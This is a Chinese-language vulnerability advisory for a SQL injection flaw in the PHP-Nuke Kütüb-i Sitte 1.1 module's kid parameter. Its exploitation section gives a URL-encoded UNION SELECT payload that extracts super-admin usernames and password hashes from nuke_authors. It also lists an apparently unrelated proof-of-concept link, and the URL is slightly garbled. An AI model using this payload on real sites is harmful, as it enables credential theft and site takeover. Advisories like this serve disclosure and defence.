添加时间:
2008-10-04

系统编号:
WAVDB-01144
BUGTRAQ: 28126

影响版本:
PHP-Nuke Kütüb-i Sitte 1.1

程序介绍:

PHP-Nuke是一个广为流行的网站创建和管理工具，它可以使用很多数据库软件作为后端，比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。

漏洞分析:

PHP-Nuke的实现上存在输入验证漏洞，如果name设置为KutubiSitte且h_op设置为hadisgoster的话，则PHP-Nuke安装的modules.php脚本就没有正确过滤对kid参数的输入，这允许远程攻击者通过特制的SQL查询请求导致执行任意代码。

漏洞利用:

http://www.example.com/modules.php?modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

http://aluigi.org/poc/maildisable.zip

解决方案:
厂商补丁：
PHP-Nuke
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://phpnuke.org/

信息来源:
<*来源：Lovebug
链接：http://secunia.com/advisories/29279/
http://marc.info/?l=bugtraq&m=120483088717586&w=2
*>